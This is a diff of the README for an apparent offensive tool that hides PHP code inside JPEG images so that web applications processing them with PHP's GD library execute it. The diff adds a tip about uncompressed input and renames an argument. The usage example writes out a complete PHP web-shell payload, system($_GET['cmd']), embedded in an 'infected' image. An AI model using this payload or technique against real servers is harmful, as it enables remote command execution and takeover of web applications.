dlegs/php-jpeg-injector/README.md

 You have a web application that runs a jpeg image through PHP's GD graphics library.

 # Description
 This script injects PHP code into a specified jpeg image.
 The web application will execute the payload if it interprets the image.
+Make sure your input jpeg is uncompressed!

 # Usage
-`python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT]`
+`python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]`

 e.g. `python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg`